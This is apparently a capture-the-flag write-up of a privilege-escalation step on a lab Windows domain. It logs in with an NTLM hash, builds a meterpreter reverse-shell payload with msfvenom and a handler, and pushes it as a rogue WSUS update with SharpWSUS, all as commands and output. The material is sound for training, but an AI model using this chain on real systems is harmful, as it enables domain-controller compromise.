Priv Esc

evil-winrm -i 10.10.11.175 -u sflowers -H 1FCDB1F6015DCB318CC77BB2BDA14DB5

LogoLocal privilege escalation – ft. WSUS misconfigurations, a rogue access point, and delivery optimization | Retest SecurityRetest Security
*Evil-WinRM* PS C:\Users\sflowers> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate
    SetActiveHours    REG_DWORD    0x1
    ActiveHoursStart    REG_DWORD    0x0
    ActiveHoursEnd    REG_DWORD    0x17
    AcceptTrustedPublisherCerts    REG_DWORD    0x1
    ExcludeWUDriversInQualityUpdate    REG_DWORD    0x1
    DoNotConnectToWindowsUpdateInternetLocations    REG_DWORD    0x1
    WUServer    REG_SZ    http://wsus.outdated.htb:8530
    WUStatusServer    REG_SZ    http://wsus.outdated.htb:8530
    UpdateServiceUrlAlternate    REG_SZ

adot@pwndot:~/opt$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.18 LPORT=4443 -f exe > shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes

adot@pwndot:~$ msfconsole -q -x 'use exploit/multi/handler;set LHOST tun0; set LPORT 4443; set payload windows/x64/meterpreter/reverse_tcp; run'
[*] Starting persistent handler(s)...
[*] Using configured payload generic/shell_reverse_tcp
LHOST => tun0
LPORT => 4443
payload => windows/x64/meterpreter/reverse_tcp
[*] Started reverse TCP handler on 10.10.14.18:4443

LogoGitHub - nettitude/SharpWSUSGitHub

Compile, upload and run

*Evil-WinRM* PS C:\Users\sflowers\Documents> .\sharpwsus.exe create /payload:"C:\programdata\psexec.exe" /args:"-accepteula -s -d C:\programdata\shell.exe" /title:"Pwned"

 ____  _                   __        ______  _   _ ____
/ ___|| |__   __ _ _ __ _ _\ \      / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
 ___) | | | | (_| | |  | |_) \ V  V /  ___) | |_| |___) |
|____/|_| |_|\__,_|_|  | .__/ \_/\_/  |____/ \___/|____/
                       |_|
           Phil Keeble @ Nettitude Red Team

[*] Action: Create Update
[*] Creating patch to use the following:
[*] Payload: psexec.exe
[*] Payload Path: C:\programdata\psexec.exe
[*] Arguments: -accepteula -s -d C:\programdata\shell.exe
[*] Arguments (HTML Encoded): -accepteula -s -d C:\programdata\shell.exe

################# WSUS Server Enumeration via SQL ##################
ServerName, WSUSPortNumber, WSUSContentLocation
-----------------------------------------------
DC, 8530, c:\WSUS\WsusContent

ImportUpdate
Update Revision ID: 30
PrepareXMLtoClient
InjectURL2Download
DeploymentRevision
PrepareBundle
PrepareBundle Revision ID: 31
PrepareXMLBundletoClient
DeploymentRevision

[*] Update created - When ready to deploy use the following command:
[*] SharpWSUS.exe approve /updateid:da80d522-aefa-44c7-9ed9-42970cb23af8 /computername:Target.FQDN /groupname:"Group Name"

[*] To check on the update status use the following command:
[*] SharpWSUS.exe check /updateid:da80d522-aefa-44c7-9ed9-42970cb23af8 /computername:Target.FQDN

[*] To delete the update use the following command:
[*] SharpWSUS.exe delete /updateid:da80d522-aefa-44c7-9ed9-42970cb23af8 /computername:Target.FQDN /groupname:"Group Name"

[*] Create complete

*Evil-WinRM* PS C:\Users\sflowers\Documents> .\SharpWSUS.exe approve /updateid:da80d522-aefa-44c7-9ed9-42970cb23af8 /computername:DC.outdated.htb /groupname:"PwnedLOL"

 ____  _                   __        ______  _   _ ____
/ ___|| |__   __ _ _ __ _ _\ \      / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
 ___) | | | | (_| | |  | |_) \ V  V /  ___) | |_| |___) |
|____/|_| |_|\__,_|_|  | .__/ \_/\_/  |____/ \___/|____/
                       |_|
           Phil Keeble @ Nettitude Red Team

[*] Action: Approve Update

Targeting DC.outdated.htb
TargetComputer, ComputerID, TargetID
------------------------------------
DC.outdated.htb, bd6d57d0-5e6f-4e74-a789-35c8955299e1, 1
Group Exists = False
Group Created: PwnedLOL
Added Computer To Group
Approved Update

[*] Approve complete

*Evil-WinRM* PS C:\Users\sflowers\Documents> .\SharpWSUS.exe check /updateid:da80d522-aefa-44c7-9ed9-42970cb23af8 /computername:DC.outdated.htb /groupname:"PwnedLOL"

 ____  _                   __        ______  _   _ ____
/ ___|| |__   __ _ _ __ _ _\ \      / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
 ___) | | | | (_| | |  | |_) \ V  V /  ___) | |_| |___) |
|____/|_| |_|\__,_|_|  | .__/ \_/\_/  |____/ \___/|____/
                       |_|
           Phil Keeble @ Nettitude Red Team

[*] Action: Check Update

Targeting DC.outdated.htb
TargetComputer, ComputerID, TargetID
------------------------------------
DC.outdated.htb, bd6d57d0-5e6f-4e74-a789-35c8955299e1, 1

[*] Update is installed

[*] Check complete
PreviousFootholdNextCredentials

Last updated

Was this helpful?